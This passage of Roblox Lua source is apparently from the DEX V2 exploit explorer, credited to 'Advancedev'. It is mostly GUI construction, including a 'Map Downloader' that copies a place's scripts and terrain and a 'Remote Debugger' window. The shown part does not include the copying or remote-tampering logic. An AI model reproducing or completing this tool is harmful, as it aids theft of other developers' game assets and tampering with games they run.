NewGuiPart93 NewGuiPart94.BackgroundTransparency = 1 NewGuiPart94.BorderSizePixel = 0 NewGuiPart94.Position = UDim2.new(0.5, -4, 0.5, -4) NewGuiPart94.Size = UDim2.new(0, 8, 0, 8) NewGuiPart95.Name = "Graphic" NewGuiPart95.Parent = NewGuiPart94 NewGuiPart95.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart95.BackgroundTransparency = 0.69999998807907 NewGuiPart95.BorderSizePixel = 0 NewGuiPart95.Position = UDim2.new(0.625, 0, 0.375, 0) NewGuiPart95.Size = UDim2.new(0.125, 0, 0.25, 0) NewGuiPart96.Name = "Graphic" NewGuiPart96.Parent = NewGuiPart94 NewGuiPart96.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart96.BackgroundTransparency = 0.69999998807907 NewGuiPart96.BorderSizePixel = 0 NewGuiPart96.Position = UDim2.new(0.5, 0, 0.25, 0) NewGuiPart96.Size = UDim2.new(0.125, 0, 0.5, 0) NewGuiPart97.Name = "Graphic" NewGuiPart97.Parent = NewGuiPart94 NewGuiPart97.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart97.BackgroundTransparency = 0.69999998807907 NewGuiPart97.BorderSizePixel = 0 NewGuiPart97.Position = UDim2.new(0.375, 0, 0.125, 0) NewGuiPart97.Size = UDim2.new(0.125, 0, 0.75, 0) NewGuiPart98.Name = "Graphic" NewGuiPart98.Parent = NewGuiPart94 NewGuiPart98.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart98.BackgroundTransparency = 0.69999998807907 NewGuiPart98.BorderSizePixel = 0 NewGuiPart98.Position = UDim2.new(0.25, 0, 0, 0) NewGuiPart98.Size = UDim2.new(0.125, 0, 1, 0) NewGuiPart99.Name = "Clipboard" NewGuiPart99.Parent = NewGuiPart86 NewGuiPart99.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart99.BackgroundTransparency = 0.5 NewGuiPart99.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart99.Position = UDim2.new(0, 0, 0, 20) NewGuiPart99.Size = UDim2.new(0, 80, 0, 20) NewGuiPart99.Font = Enum.Font.SourceSans NewGuiPart99.FontSize = Enum.FontSize.Size14 NewGuiPart99.Text = "To Clipboard" NewGuiPart100.Name = "ScriptBar" NewGuiPart100.Parent = NewGuiPart86 NewGuiPart100.BackgroundColor3 = Color3.new(0.823529, 0.823529, 0.823529) NewGuiPart100.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart100.ClipsDescendants = true NewGuiPart100.Position = UDim2.new(0, 0, 0, 40) NewGuiPart100.Size = UDim2.new(1, -32, 0, 20) NewGuiPart101.Name = "Entry" NewGuiPart101.Parent = NewGuiPart86 NewGuiPart101.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart101.BackgroundTransparency = 1 NewGuiPart101.Size = UDim2.new(0, 100, 1, 0) NewGuiPart101.Visible = false NewGuiPart102.Name = "Button" NewGuiPart102.Parent = NewGuiPart101 NewGuiPart102.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart102.BackgroundTransparency = 0.60000002384186 NewGuiPart102.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart102.ClipsDescendants = true NewGuiPart102.Size = UDim2.new(1, 0, 1, 0) NewGuiPart102.ZIndex = 4 NewGuiPart102.Font = Enum.Font.SourceSans NewGuiPart102.FontSize = Enum.FontSize.Size12 NewGuiPart102.Text = "" NewGuiPart102.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart103.Name = "Close" NewGuiPart103.Parent = NewGuiPart101 NewGuiPart103.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart103.BackgroundTransparency = 1 NewGuiPart103.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart103.Position = UDim2.new(1, -20, 0, 0) NewGuiPart103.Size = UDim2.new(0, 20, 0, 20) NewGuiPart103.ZIndex = 4 NewGuiPart103.Font = Enum.Font.SourceSans NewGuiPart103.FontSize = Enum.FontSize.Size14 NewGuiPart103.Text = "X" NewGuiPart104.Name = "Close" NewGuiPart104.Parent = NewGuiPart82 NewGuiPart104.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart104.BackgroundTransparency = 1 NewGuiPart104.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart104.Position = UDim2.new(1, -20, 0, 0) NewGuiPart104.Size = UDim2.new(0, 20, 0, 20) NewGuiPart104.ZIndex = 5 NewGuiPart104.Font = Enum.Font.SourceSans NewGuiPart104.FontSize = Enum.FontSize.Size14 NewGuiPart104.Text = "X" NewGuiPart105.Name = "IntroFrame" NewGuiPart105.Parent = NewGuiPart1 NewGuiPart105.BackgroundColor3 = Color3.new(0.960784, 0.960784, 0.960784) NewGuiPart105.BorderSizePixel = 0 NewGuiPart105.Position = UDim2.new(1, 30, 0, 0) NewGuiPart105.Size = UDim2.new(0, 300, 1, 0) NewGuiPart105.ZIndex = 2 NewGuiPart106.Name = "Main" NewGuiPart106.Parent = NewGuiPart105 NewGuiPart106.BackgroundColor3 = Color3.new(0.960784, 0.960784, 0.960784) NewGuiPart106.BorderSizePixel = 0 NewGuiPart106.Position = UDim2.new(0, -30, 0, 0) NewGuiPart106.Size = UDim2.new(0, 30, 0, 90) NewGuiPart106.ZIndex = 2 NewGuiPart107.Name = "Title" NewGuiPart107.Parent = NewGuiPart105 NewGuiPart107.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart107.BackgroundTransparency = 1 NewGuiPart107.Position = UDim2.new(0, 100, 0, 150) NewGuiPart107.Size = UDim2.new(0, 100, 0, 60) NewGuiPart107.ZIndex = 2 NewGuiPart107.Font = Enum.Font.SourceSansBold NewGuiPart107.FontSize = Enum.FontSize.Size60 NewGuiPart107.Text = "DEX" NewGuiPart107.TextWrapped = true NewGuiPart108.Name = "Version" NewGuiPart108.Parent = NewGuiPart105 NewGuiPart108.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart108.BackgroundTransparency = 1 NewGuiPart108.Position = UDim2.new(0, 100, 0, 210) NewGuiPart108.Size = UDim2.new(0, 100, 0, 30) NewGuiPart108.ZIndex = 2 NewGuiPart108.Font = Enum.Font.SourceSansBold NewGuiPart108.FontSize = Enum.FontSize.Size28 NewGuiPart108.Text = "V2.0.0" NewGuiPart108.TextWrapped = true NewGuiPart109.Name = "Creator" NewGuiPart109.Parent = NewGuiPart105 NewGuiPart109.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart109.BackgroundTransparency = 1 NewGuiPart109.Position = UDim2.new(0, 80, 0, 300) NewGuiPart109.Size = UDim2.new(0, 140, 0, 30) NewGuiPart109.ZIndex = 2 NewGuiPart109.Font = Enum.Font.SourceSansBold NewGuiPart109.FontSize = Enum.FontSize.Size28 NewGuiPart109.Text = "Raspberry Pi , Script Made By Advancedev" NewGuiPart109.TextWrapped = true NewGuiPart110.Name = "Slant" NewGuiPart110.Parent = NewGuiPart105 NewGuiPart110.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart110.BackgroundTransparency = 1 NewGuiPart110.Position = UDim2.new(0, -30, 0, 90) NewGuiPart110.Rotation = 180 NewGuiPart110.Size = UDim2.new(0, 30, 0, 30) NewGuiPart110.ZIndex = 2 NewGuiPart110.Image = "rbxassetid://474172996" NewGuiPart110.ImageColor3 = Color3.new(0.960784, 0.960784, 0.960784) NewGuiPart111.Name = "SaveMapWindow" NewGuiPart111.Parent = NewGuiPart1 NewGuiPart111.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart111.BackgroundTransparency = 0.10000000149012 NewGuiPart111.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart111.Position = UDim2.new(1, 0, 0, 0) NewGuiPart111.Size = UDim2.new(0, 300, 1, 0) NewGuiPart112.Name = "Header" NewGuiPart112.Parent = NewGuiPart111 NewGuiPart112.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart112.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart112.Size = UDim2.new(1, 0, 0, 17) NewGuiPart113.Parent = NewGuiPart112 NewGuiPart113.BackgroundTransparency = 1 NewGuiPart113.Position = UDim2.new(0, 4, 0, 0) NewGuiPart113.Size = UDim2.new(1, -4, 1, 0) NewGuiPart113.Font = Enum.Font.SourceSans NewGuiPart113.FontSize = Enum.FontSize.Size14 NewGuiPart113.Text = "Map Downloader" NewGuiPart113.TextColor3 = Color3.new(0, 0, 0) NewGuiPart113.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart114.Name = "MapSettings" NewGuiPart114.Parent = NewGuiPart111 NewGuiPart114.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart114.BackgroundTransparency = 1 NewGuiPart114.Position = UDim2.new(0, 0, 0, 200) NewGuiPart114.Size = UDim2.new(1, 0, 0, 240) NewGuiPart115.Name = "Terrain" NewGuiPart115.Parent = NewGuiPart114 NewGuiPart115.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart115.BackgroundTransparency = 1 NewGuiPart115.Position = UDim2.new(0, 0, 0, 60) NewGuiPart115.Size = UDim2.new(1, 0, 0, 60) NewGuiPart116.Name = "SName" NewGuiPart116.Parent = NewGuiPart115 NewGuiPart116.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart116.BackgroundTransparency = 1 NewGuiPart116.Position = UDim2.new(0, 10, 0, 0) NewGuiPart116.Size = UDim2.new(1, -20, 0, 30) NewGuiPart116.Font = Enum.Font.SourceSans NewGuiPart116.FontSize = Enum.FontSize.Size18 NewGuiPart116.Text = "Save Terrain" NewGuiPart116.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart117.Name = "Status" NewGuiPart117.Parent = NewGuiPart115 NewGuiPart117.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart117.BackgroundTransparency = 1 NewGuiPart117.Position = UDim2.new(0, 60, 0, 30) NewGuiPart117.Size = UDim2.new(0, 50, 0, 15) NewGuiPart117.Font = Enum.Font.SourceSans NewGuiPart117.FontSize = Enum.FontSize.Size18 NewGuiPart117.Text = "Off" NewGuiPart117.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart118.Name = "Change" NewGuiPart118.Parent = NewGuiPart115 NewGuiPart118.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart118.BorderSizePixel = 0 NewGuiPart118.Position = UDim2.new(0, 10, 0, 30) NewGuiPart118.Size = UDim2.new(0, 40, 0, 15) NewGuiPart118.Font = Enum.Font.SourceSans NewGuiPart118.FontSize = Enum.FontSize.Size14 NewGuiPart118.Text = "" NewGuiPart119.Name = "OnBar" NewGuiPart119.Parent = NewGuiPart118 NewGuiPart119.BackgroundColor3 = Color3.new(0, 0.576471, 0.862745) NewGuiPart119.BorderSizePixel = 0 NewGuiPart119.Size = UDim2.new(0, 0, 0, 15) NewGuiPart119.Font = Enum.Font.SourceSans NewGuiPart119.FontSize = Enum.FontSize.Size14 NewGuiPart119.Text = "" NewGuiPart120.Name = "Bar" NewGuiPart120.Parent = NewGuiPart118 NewGuiPart120.BackgroundColor3 = Color3.new(0, 0, 0) NewGuiPart120.BorderSizePixel = 0 NewGuiPart120.ClipsDescendants = true NewGuiPart120.Position = UDim2.new(0, -2, 0, -2) NewGuiPart120.Size = UDim2.new(0, 10, 0, 19) NewGuiPart120.Font = Enum.Font.SourceSans NewGuiPart120.FontSize = Enum.FontSize.Size14 NewGuiPart120.Text = "" NewGuiPart121.Name = "Lighting" NewGuiPart121.Parent = NewGuiPart114 NewGuiPart121.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart121.BackgroundTransparency = 1 NewGuiPart121.Position = UDim2.new(0, 0, 0, 120) NewGuiPart121.Size = UDim2.new(1, 0, 0, 60) NewGuiPart122.Name = "SName" NewGuiPart122.Parent = NewGuiPart121 NewGuiPart122.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart122.BackgroundTransparency = 1 NewGuiPart122.Position = UDim2.new(0, 10, 0, 0) NewGuiPart122.Size = UDim2.new(1, -20, 0, 30) NewGuiPart122.Font = Enum.Font.SourceSans NewGuiPart122.FontSize = Enum.FontSize.Size18 NewGuiPart122.Text = "Lighting Properties" NewGuiPart122.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart123.Name = "Status" NewGuiPart123.Parent = NewGuiPart121 NewGuiPart123.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart123.BackgroundTransparency = 1 NewGuiPart123.Position = UDim2.new(0, 60, 0, 30) NewGuiPart123.Size = UDim2.new(0, 50, 0, 15) NewGuiPart123.Font = Enum.Font.SourceSans NewGuiPart123.FontSize = Enum.FontSize.Size18 NewGuiPart123.Text = "Off" NewGuiPart123.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart124.Name = "Change" NewGuiPart124.Parent = NewGuiPart121 NewGuiPart124.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart124.BorderSizePixel = 0 NewGuiPart124.Position = UDim2.new(0, 10, 0, 30) NewGuiPart124.Size = UDim2.new(0, 40, 0, 15) NewGuiPart124.Font = Enum.Font.SourceSans NewGuiPart124.FontSize = Enum.FontSize.Size14 NewGuiPart124.Text = "" NewGuiPart125.Name = "OnBar" NewGuiPart125.Parent = NewGuiPart124 NewGuiPart125.BackgroundColor3 = Color3.new(0, 0.576471, 0.862745) NewGuiPart125.BorderSizePixel = 0 NewGuiPart125.Size = UDim2.new(0, 0, 0, 15) NewGuiPart125.Font = Enum.Font.SourceSans NewGuiPart125.FontSize = Enum.FontSize.Size14 NewGuiPart125.Text = "" NewGuiPart126.Name = "Bar" NewGuiPart126.Parent = NewGuiPart124 NewGuiPart126.BackgroundColor3 = Color3.new(0, 0, 0) NewGuiPart126.BorderSizePixel = 0 NewGuiPart126.ClipsDescendants = true NewGuiPart126.Position = UDim2.new(0, -2, 0, -2) NewGuiPart126.Size = UDim2.new(0, 10, 0, 19) NewGuiPart126.Font = Enum.Font.SourceSans NewGuiPart126.FontSize = Enum.FontSize.Size14 NewGuiPart126.Text = "" NewGuiPart127.Name = "CameraInstances" NewGuiPart127.Parent = NewGuiPart114 NewGuiPart127.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart127.BackgroundTransparency = 1 NewGuiPart127.Position = UDim2.new(0, 0, 0, 180) NewGuiPart127.Size = UDim2.new(1, 0, 0, 60) NewGuiPart128.Name = "SName" NewGuiPart128.Parent = NewGuiPart127 NewGuiPart128.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart128.BackgroundTransparency = 1 NewGuiPart128.Position = UDim2.new(0, 10, 0, 0) NewGuiPart128.Size = UDim2.new(1, -20, 0, 30) NewGuiPart128.Font = Enum.Font.SourceSans NewGuiPart128.FontSize = Enum.FontSize.Size18 NewGuiPart128.Text = "Camera Instances" NewGuiPart128.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart129.Name = "Status" NewGuiPart129.Parent = NewGuiPart127 NewGuiPart129.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart129.BackgroundTransparency = 1 NewGuiPart129.Position = UDim2.new(0, 60, 0, 30) NewGuiPart129.Size = UDim2.new(0, 50, 0, 15) NewGuiPart129.Font = Enum.Font.SourceSans NewGuiPart129.FontSize = Enum.FontSize.Size18 NewGuiPart129.Text = "Off" NewGuiPart129.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart130.Name = "Change" NewGuiPart130.Parent = NewGuiPart127 NewGuiPart130.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart130.BorderSizePixel = 0 NewGuiPart130.Position = UDim2.new(0, 10, 0, 30) NewGuiPart130.Size = UDim2.new(0, 40, 0, 15) NewGuiPart130.Font = Enum.Font.SourceSans NewGuiPart130.FontSize = Enum.FontSize.Size14 NewGuiPart130.Text = "" NewGuiPart131.Name = "OnBar" NewGuiPart131.Parent = NewGuiPart130 NewGuiPart131.BackgroundColor3 = Color3.new(0, 0.576471, 0.862745) NewGuiPart131.BorderSizePixel = 0 NewGuiPart131.Size = UDim2.new(0, 0, 0, 15) NewGuiPart131.Font = Enum.Font.SourceSans NewGuiPart131.FontSize = Enum.FontSize.Size14 NewGuiPart131.Text = "" NewGuiPart132.Name = "Bar" NewGuiPart132.Parent = NewGuiPart130 NewGuiPart132.BackgroundColor3 = Color3.new(0, 0, 0) NewGuiPart132.BorderSizePixel = 0 NewGuiPart132.ClipsDescendants = true NewGuiPart132.Position = UDim2.new(0, -2, 0, -2) NewGuiPart132.Size = UDim2.new(0, 10, 0, 19) NewGuiPart132.Font = Enum.Font.SourceSans NewGuiPart132.FontSize = Enum.FontSize.Size14 NewGuiPart132.Text = "" NewGuiPart133.Name = "Scripts" NewGuiPart133.Parent = NewGuiPart114 NewGuiPart133.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart133.BackgroundTransparency = 1 NewGuiPart133.Size = UDim2.new(1, 0, 0, 60) NewGuiPart134.Name = "SName" NewGuiPart134.Parent = NewGuiPart133 NewGuiPart134.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart134.BackgroundTransparency = 1 NewGuiPart134.Position = UDim2.new(0, 10, 0, 0) NewGuiPart134.Size = UDim2.new(1, -20, 0, 30) NewGuiPart134.Font = Enum.Font.SourceSans NewGuiPart134.FontSize = Enum.FontSize.Size18 NewGuiPart134.Text = "Save Scripts" NewGuiPart134.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart135.Name = "Status" NewGuiPart135.Parent = NewGuiPart133 NewGuiPart135.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart135.BackgroundTransparency = 1 NewGuiPart135.Position = UDim2.new(0, 60, 0, 30) NewGuiPart135.Size = UDim2.new(0, 50, 0, 15) NewGuiPart135.Font = Enum.Font.SourceSans NewGuiPart135.FontSize = Enum.FontSize.Size18 NewGuiPart135.Text = "Off" NewGuiPart135.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart136.Name = "Change" NewGuiPart136.Parent = NewGuiPart133 NewGuiPart136.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart136.BorderSizePixel = 0 NewGuiPart136.Position = UDim2.new(0, 10, 0, 30) NewGuiPart136.Size = UDim2.new(0, 40, 0, 15) NewGuiPart136.Font = Enum.Font.SourceSans NewGuiPart136.FontSize = Enum.FontSize.Size14 NewGuiPart136.Text = "" NewGuiPart137.Name = "OnBar" NewGuiPart137.Parent = NewGuiPart136 NewGuiPart137.BackgroundColor3 = Color3.new(0, 0.576471, 0.862745) NewGuiPart137.BorderSizePixel = 0 NewGuiPart137.Size = UDim2.new(0, 0, 0, 15) NewGuiPart137.Font = Enum.Font.SourceSans NewGuiPart137.FontSize = Enum.FontSize.Size14 NewGuiPart137.Text = "" NewGuiPart138.Name = "Bar" NewGuiPart138.Parent = NewGuiPart136 NewGuiPart138.BackgroundColor3 = Color3.new(0, 0, 0) NewGuiPart138.BorderSizePixel = 0 NewGuiPart138.ClipsDescendants = true NewGuiPart138.Position = UDim2.new(0, -2, 0, -2) NewGuiPart138.Size = UDim2.new(0, 10, 0, 19) NewGuiPart138.Font = Enum.Font.SourceSans NewGuiPart138.FontSize = Enum.FontSize.Size14 NewGuiPart138.Text = "" NewGuiPart139.Name = "ToSave" NewGuiPart139.Parent = NewGuiPart111 NewGuiPart139.BackgroundTransparency = 1 NewGuiPart139.Position = UDim2.new(0, 0, 0, 17) NewGuiPart139.Size = UDim2.new(1, 0, 0, 20) NewGuiPart139.Font = Enum.Font.SourceSans NewGuiPart139.FontSize = Enum.FontSize.Size18 NewGuiPart139.Text = "To Save" NewGuiPart139.TextColor3 = Color3.new(0, 0, 0) NewGuiPart140.Name = "CopyList" NewGuiPart140.Parent = NewGuiPart111 NewGuiPart140.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart140.BackgroundTransparency = 0.80000001192093 NewGuiPart140.Position = UDim2.new(0, 0, 0, 37) NewGuiPart140.Size = UDim2.new(1, 0, 0, 163) NewGuiPart141.Name = "Bottom" NewGuiPart141.Parent = NewGuiPart111 NewGuiPart141.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart141.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart141.Position = UDim2.new(0, 0, 1, -50) NewGuiPart141.Size = UDim2.new(1, 0, 0, 50) NewGuiPart142.Parent = NewGuiPart141 NewGuiPart142.BackgroundTransparency = 1 NewGuiPart142.Position = UDim2.new(0, 4, 0, 0) NewGuiPart142.Size = UDim2.new(1, -4, 1, 0) NewGuiPart142.Font = Enum.Font.SourceSans NewGuiPart142.FontSize = Enum.FontSize.Size14 NewGuiPart142.Text = "After the map saves, open a new place on studio, then right click Lighting and \"Insert from file...\", then select your file and run the unpacker script inside the folder." NewGuiPart142.TextColor3 = Color3.new(0, 0, 0) NewGuiPart142.TextWrapped = true NewGuiPart142.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart142.TextYAlignment = Enum.TextYAlignment.Top NewGuiPart143.Name = "Save" NewGuiPart143.Parent = NewGuiPart111 NewGuiPart143.BackgroundColor3 = Color3.new(0.941177, 0.941177, 0.941177) NewGuiPart143.BackgroundTransparency = 0.80000001192093 NewGuiPart143.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart143.Position = UDim2.new(0, 0, 1, -80) NewGuiPart143.Size = UDim2.new(1, 0, 0, 30) NewGuiPart143.Font = Enum.Font.SourceSans NewGuiPart143.FontSize = Enum.FontSize.Size18 NewGuiPart143.Text = "Save" NewGuiPart144.Name = "FileName" NewGuiPart144.Parent = NewGuiPart111 NewGuiPart144.BackgroundColor3 = Color3.new(0.941177, 0.941177, 0.941177) NewGuiPart144.BackgroundTransparency = 0.60000002384186 NewGuiPart144.Position = UDim2.new(0, 0, 1, -105) NewGuiPart144.Size = UDim2.new(1, 0, 0, 25) NewGuiPart144.Font = Enum.Font.SourceSans NewGuiPart144.FontSize = Enum.FontSize.Size18 NewGuiPart144.Text = "PlaceName" NewGuiPart144.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart145.Name = "Entry" NewGuiPart145.Parent = NewGuiPart111 NewGuiPart145.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart145.BackgroundTransparency = 1 NewGuiPart145.Size = UDim2.new(1, 0, 0, 22) NewGuiPart145.Visible = false NewGuiPart146.Name = "Change" NewGuiPart146.Parent = NewGuiPart145 NewGuiPart146.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart146.BackgroundTransparency = 0.60000002384186 NewGuiPart146.Position = UDim2.new(0, 10, 0, 1) NewGuiPart146.Size = UDim2.new(0, 20, 0, 20) NewGuiPart146.ZIndex = 2 NewGuiPart146.Font = Enum.Font.SourceSans NewGuiPart146.FontSize = Enum.FontSize.Size18 NewGuiPart146.Text = "" NewGuiPart146.TextColor3 = Color3.new(1, 1, 1) NewGuiPart147.Name = "enabled" NewGuiPart147.Parent = NewGuiPart146 NewGuiPart147.BackgroundColor3 = Color3.new(0.380392, 0.380392, 0.380392) NewGuiPart147.BackgroundTransparency = 0.40000000596046 NewGuiPart147.BorderSizePixel = 0 NewGuiPart147.Position = UDim2.new(0, 3, 0, 3) NewGuiPart147.Size = UDim2.new(0, 14, 0, 14) NewGuiPart147.Font = Enum.Font.SourceSans NewGuiPart147.FontSize = Enum.FontSize.Size14 NewGuiPart147.Text = "" NewGuiPart148.Name = "Info" NewGuiPart148.Parent = NewGuiPart145 NewGuiPart148.BackgroundTransparency = 1 NewGuiPart148.Position = UDim2.new(0, 40, 0, 0) NewGuiPart148.Size = UDim2.new(1, -40, 0, 22) NewGuiPart148.Font = Enum.Font.SourceSans NewGuiPart148.FontSize = Enum.FontSize.Size18 NewGuiPart148.Text = "Workspace" NewGuiPart148.TextColor3 = Color3.new(0, 0, 0) NewGuiPart148.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart149.Name = "RemoteDebugWindow" NewGuiPart149.Parent = NewGuiPart1 NewGuiPart149.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart149.BackgroundTransparency = 0.10000000149012 NewGuiPart149.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart149.Position = UDim2.new(1, 0, 0, 0) NewGuiPart149.Size = UDim2.new(0, 300, 1, 0) NewGuiPart161.Name = "GetSetting" NewGuiPart161.Parent = NewGuiPart149 NewGuiPart161.Archivable = true NewGuiPart150.Name = "Header" NewGuiPart150.Parent = NewGuiPart149 NewGuiPart150.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart150.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart150.Size = UDim2.new(1, 0, 0, 17) NewGuiPart151.Parent = NewGuiPart150 NewGuiPart151.BackgroundTransparency = 1 NewGuiPart151.Position = UDim2.new(0, 4, 0, 0) NewGuiPart151.Size = UDim2.new(1, -4, 1, 0) NewGuiPart151.Font = Enum.Font.SourceSans NewGuiPart151.FontSize = Enum.FontSize.Size14 NewGuiPart151.Text = "Remote Debugger" NewGuiPart151.TextColor3 = Color3.new(0, 0, 0) NewGuiPart151.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart152.Name = "Desc" NewGuiPart152.Parent = NewGuiPart149 NewGuiPart152.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart152.BackgroundTransparency = 1 NewGuiPart152.Position = UDim2.new(0, 0, 0, 20) NewGuiPart152.Size = UDim2.new(1, 0, 0, 40) NewGuiPart152.Font = Enum.Font.SourceSans NewGuiPart152.FontSize = Enum.FontSize.Size32 NewGuiPart152.Text = "Have fun with remotes" NewGuiPart152.TextWrapped = true return NewGuiPart1 end local D_E_X = CreateGui() D_E_X.Parent = game:GetService("Players").LocalPlayer.PlayerGui spawn(function() local Gui = D_E_X local IntroFrame = Gui:WaitForChild("IntroFrame") local SideMenu = Gui:WaitForChild("SideMenu") local OpenToggleButton = Gui:WaitForChild("Toggle") local CloseToggleButton = SideMenu:WaitForChild("Toggle") local OpenScriptEditorButton = SideMenu:WaitForChild("OpenScriptEditor") local ScriptEditor = Gui:WaitForChild("ScriptEditor") local SlideOut = SideMenu:WaitForChild("SlideOut") local SlideFrame = SlideOut:WaitForChild("SlideFrame") local Slant = SideMenu:WaitForChild("Slant") local ExplorerButton = SlideFrame:WaitForChild("Explorer") local SettingsButton = SlideFrame:WaitForChild("Settings") local SelectionBox = Instance.new("SelectionBox") SelectionBox.Parent = Gui local ExplorerPanel = Gui:WaitForChild("ExplorerPanel") local PropertiesFrame = Gui:WaitForChild("PropertiesFrame") local SaveMapWindow = Gui:WaitForChild("SaveMapWindow") local RemoteDebugWindow = Gui:WaitForChild("RemoteDebugWindow") local SettingsPanel = Gui:WaitForChild("SettingsPanel") local SettingsListener = SettingsPanel:WaitForChild("GetSetting") local SettingTemplate = SettingsPanel:WaitForChild("SettingTemplate") local SettingList = SettingsPanel:WaitForChild("SettingList") local SaveMapCopyList = SaveMapWindow:WaitForChild("CopyList") local SaveMapSettingFrame = SaveMapWindow:WaitForChild("MapSettings") local SaveMapName = SaveMapWindow:WaitForChild("FileName") local SaveMapButton = SaveMapWindow:WaitForChild("Save") local SaveMapCopyTemplate = SaveMapWindow:WaitForChild("Entry") local SaveMapSettings = { CopyWhat = { Workspace = true, Lighting = true, ReplicatedStorage = true, ReplicatedFirst = true, StarterPack = true, StarterGui = true, StarterPlayer = true }, SaveScripts = true, SaveTerrain = true, LightingProperties = true, CameraInstances = true } local TotallyNotSelectionChanged = ExplorerPanel:WaitForChild("TotallyNotSelectionChanged") local TotallyNotGetSelection = ExplorerPanel:WaitForChild("TotallyNotGetSelection") local TotallyNotSetSelection = ExplorerPanel:WaitForChild("TotallyNotSetSelection") local Player = game:GetService("Players").LocalPlayer local Mouse = Player:GetMouse() local CurrentWindow = "Nothing c:" local Windows = { Explorer = { ExplorerPanel, PropertiesFrame }, Settings = {SettingsPanel}, SaveMap = {SaveMapWindow}, Remotes = {RemoteDebugWindow} } function switchWindows(wName,over) if CurrentWindow == wName and not over then return end local count = 0 for i,v in pairs(Windows) do count = 0 if i ~= wName then for _,c in pairs(v) do c:TweenPosition(UDim2.new(1, 30, count * 0.5, count * 36), "Out", "Quad", 0.5, true) count = count + 1 end end end count = 0 if Windows[wName] then for _,c in pairs(Windows[wName]) do c:TweenPosition(UDim2.new(1, -300, count * 0.5, count * 36), "Out", "Quad", 0.5, true) count = count + 1 end end if wName ~= "Nothing c:" then CurrentWindow = wName for i,v in pairs(SlideFrame:GetChildren()) do v.BackgroundTransparency = 1 v.Icon.ImageColor3 = Color3.new(70/255, 70/255, 70/255) end if SlideFrame:FindFirstChild(wName) then SlideFrame[wName].BackgroundTransparency = 0.5 SlideFrame[wName].Icon.ImageColor3 = Color3.new(0,0,0) end end end function toggleDex(on) if on then SideMenu:TweenPosition(UDim2.new(1, -330, 0, 0), "Out", "Quad", 0.5, true) OpenToggleButton:TweenPosition(UDim2.new(1,0,0,0), "Out", "Quad", 0.5, true) switchWindows(CurrentWindow,true) else SideMenu:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Quad", 0.5, true) OpenToggleButton:TweenPosition(UDim2.new(1,-30,0,0), "Out", "Quad", 0.5, true) switchWindows("Nothing c:") end end local Settings = { ClickSelect = false, SelBox = false, ClearProps = false, SelectUngrouped = true, SaveInstanceScripts = true } function ReturnSetting(set) if set == "ClearProps" then return Settings.ClearProps elseif set == "SelectUngrouped" then return Settings.SelectUngrouped end end OpenToggleButton.MouseButton1Up:connect(function() toggleDex(true) end) OpenScriptEditorButton.MouseButton1Up:connect(function() if OpenScriptEditorButton.Active then 